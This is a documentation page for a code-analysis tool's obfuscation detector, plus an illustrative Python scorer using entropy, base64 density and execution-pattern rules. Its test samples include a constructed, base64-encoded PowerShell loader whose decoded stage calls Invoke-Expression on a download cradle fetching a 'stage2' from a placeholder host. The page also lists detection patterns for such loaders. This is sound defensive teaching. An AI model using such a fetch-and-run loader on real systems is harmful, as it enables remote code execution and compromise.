Obfuscation Detection — Spotting hidden code
Obfuscation hides intent. Decoder flags suspicious entropy, base64 walls, eval chains, and packing markers so reviewers can focus on what's actually hidden.
What it is
A set of heuristics that score how unreadable or non-natural a chunk of code is, so that the reviewer's attention goes to the parts that were deliberately made hard to read.
Why it's useful
Malicious payloads are routinely obfuscated before delivery, because the obfuscation is what gets them past readers and signature-based scanners. Detecting that something is hidden is half the job; the other half is peeling it back.
How Decoder implements it
Combines sliding-window entropy, base64 and hex density, pattern matching for dynamic execution (eval, exec, Invoke-Expression and similar), and AI explanation for context. No single signal is decisive; the verdict comes from several firing together.
When to use it
Any script or binary from an untrusted source.
When NOT to use it
Minified production bundles: expect false positives, since minification strips exactly the readability these heuristics measure and legitimately embeds long base64 blobs; pair with AI explain to separate deliberate hiding from build output.
Practical example
A PowerShell loader with an entropy score of 0.92 that passes a base64 blob to Invoke-Expression trips several rules at once: the entropy window, the base64-wall check, and the dynamic-execution pattern. Each on its own could be benign; together they describe a loader.
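The combination described under "How Decoder implements it" and the loader in the practical example, as an added Python example that is not Decoder's code: a small scorer with sliding-window entropy, base64 and hex density, and dynamic-execution patterns, run over three constructed inputs (an encoded PowerShell loader, a benign admin script, and a minified bundle carrying an inline data: URI). Thresholds, weights, the verdict tiers and all sample inputs are assumptions; the decode-and-rescan step that peels one base64 layer is a practitioner addition the page does not describe.

```python
import base64
import math
import re
from collections import Counter
from typing import Optional

# Thresholds and weights are illustrative assumptions, not Decoder's tuned values.
ENTROPY_THRESHOLD = 0.70  # normalised 0..1; base64 text peaks near 0.75, packed/encrypted bytes near 1.0
DENSITY_THRESHOLD = 0.30  # fraction of the file taken up by base64 or hex runs
WINDOW = 256              # bytes per entropy window
WEIGHTS = {"entropy": 1, "base64": 1, "hex": 1, "exec": 2, "exec-decoded": 2}

BASE64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")
HEX_RUN = re.compile(rb"(?:\\x[0-9A-Fa-f]{2}){16,}|(?:0x[0-9A-Fa-f]{1,2}\s*,\s*){16,}")
EXEC_PATTERNS = [  # dynamic-execution markers for PowerShell and JavaScript
    (re.compile(rb"\bInvoke-Expression\b|\biex\b", re.I), "Invoke-Expression"),
    (re.compile(rb"FromBase64String", re.I), "FromBase64String"),
    (re.compile(rb"\s-e(?:c|nc|ncodedcommand)?\s", re.I), "-EncodedCommand"),
    (re.compile(rb"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient)\b", re.I), "download cradle"),
    (re.compile(rb"\b(?:eval|exec)\s*\(", re.I), "eval/exec call"),
    (re.compile(rb"\bnew\s+Function\s*\(", re.I), "Function constructor"),
]


def normalized_entropy(data: bytes) -> float:
    """Shannon entropy of the byte distribution, divided by the 8-bit maximum."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) / 8.0


def max_window_entropy(data: bytes, window: int = WINDOW) -> float:
    """Highest entropy over sliding windows, so a packed blob inside plain text is not averaged away."""
    if len(data) <= window:
        return normalized_entropy(data)
    starts = list(range(0, len(data) - window + 1, window // 2)) + [len(data) - window]
    return max(normalized_entropy(data[s:s + window]) for s in starts)


def decode_layer(blob: bytes) -> Optional[bytes]:
    """Base64-decode one wall. PowerShell -EncodedCommand and [Text.Encoding]::Unicode emit
    UTF-16LE, which shows up as a zero in every odd byte; convert that to UTF-8 so the same
    patterns can be rescanned one layer down."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError: wrong length or padding
        return None
    if len(raw) >= 2 and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16le", errors="replace").encode()
    return raw


def _density(pattern: re.Pattern, data: bytes) -> float:
    return sum(len(m.group(0)) for m in pattern.finditer(data)) / len(data) if data else 0.0


def scan(data: bytes) -> dict:
    """Combine the signals into weighted findings and a coarse verdict."""
    findings = []
    ent = max_window_entropy(data)
    if ent >= ENTROPY_THRESHOLD:
        findings.append(("entropy", f"high-entropy window ({ent:.2f} normalised)"))
    b64 = _density(BASE64_RUN, data)
    if b64 >= DENSITY_THRESHOLD:
        findings.append(("base64", f"base64 wall ({b64:.0%} of bytes)"))
    if _density(HEX_RUN, data) >= DENSITY_THRESHOLD:
        findings.append(("hex", "hex-escaped byte array"))
    for pat, name in EXEC_PATTERNS:
        if pat.search(data):
            findings.append(("exec", f"dynamic execution: {name}"))
    for m in BASE64_RUN.finditer(data):  # peel one layer and look for execution markers inside
        inner = decode_layer(m.group(0))
        for pat, name in EXEC_PATTERNS:
            if inner is not None and pat.search(inner):
                findings.append(("exec-decoded", f"decoded layer: {name}"))
    score = sum(WEIGHTS[kind] for kind, _ in findings)
    verdict = "likely obfuscated" if score >= 4 else "review" if score else "clean"
    return {"entropy": ent, "base64_density": b64, "findings": [f for _, f in findings],
            "score": score, "verdict": verdict}


# --- Constructed samples (not real malware; example.invalid is a reserved name) ---
_STAGE2 = "(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
_BLOB = base64.b64encode(_STAGE2.encode("utf-16le")).decode()
LOADER_PS1 = f"""
$enc = "{_BLOB}"
$code = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($enc))
Invoke-Expression $code
""".encode()

BENIGN_PS1 = b"""
Get-ChildItem -Path C:\\Logs -Filter *.log |
    Where-Object { $_.Length -gt 1MB } |
    Sort-Object Length -Descending |
    Select-Object -First 10 Name, Length
"""

# Minified bundle with an inline data: URI, the false-positive case the page warns about.
_IMG = base64.b64encode(bytes(range(256))).decode()  # stands in for image bytes
MINIFIED_JS = (b'!function(e){var t=e.document,n="data:image/png;base64,' + _IMG.encode()
               + b'";t.body.style.background="url("+n+")"}(window);')

if __name__ == "__main__":
    for name, sample in [("loader.ps1", LOADER_PS1), ("admin.ps1", BENIGN_PS1), ("bundle.min.js", MINIFIED_JS)]:
        r = scan(sample)
        print(f"{name}: {r['verdict']} (score {r['score']}, max window entropy {r['entropy']:.2f}, "
              f"base64 {r['base64_density']:.0%})")
        for f in r["findings"]:
            print("  -", f)
```

Two things worth noticing when you run it. The loader does not trip the entropy rule at all: UTF-16LE puts a zero in every other byte, and base64 of that has a lopsided symbol distribution, so encoded commands look far less random than the page's 0.92 example; the base64 wall, FromBase64String and Invoke-Expression carry the verdict, and the peeled layer adds the download cradle. The minified bundle trips the base64 wall (and possibly the entropy window) but has no execution marker, so it lands in "review" rather than "likely obfuscated"; that is the false positive "When NOT to use it" describes, and why the execution patterns carry double weight.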
Glossary
- Packing: Compressing/encrypting an executable to hide its real code until runtime.
- Base64 wall: Large base64 blob embedded inline — common loader pattern.
Related
Entropy is a statistical measure of how 'random' the bytes in a file look. In malware analysis, abnormally high entropy is a strong signal that a section is packed, encrypted or otherwise obfuscated.
PowerShell is the workhorse of Windows post-exploitation. Decoder reads `.ps1` files statically and surfaces the patterns attackers rely on: encoded commands, `Invoke-Expression`, download cradles, AMSI bypasses.
YARA is a rule language used by malware analysts to describe families and behaviours. Decoder applies YARA-style heuristics during malware scans.
AI-Origin Detection estimates whether a code artefact was likely produced by an LLM, and explains why. The goal is informed review, not gatekeeping.
LockBit 3.0 leaked source provided a real-world benchmark. This entry walks through what Decoder flags and why — useful as a reference for ransomware patterns.
JavaScript and TypeScript are first-class in Decoder. Upload single files, ZIPs, or import a GitHub repo.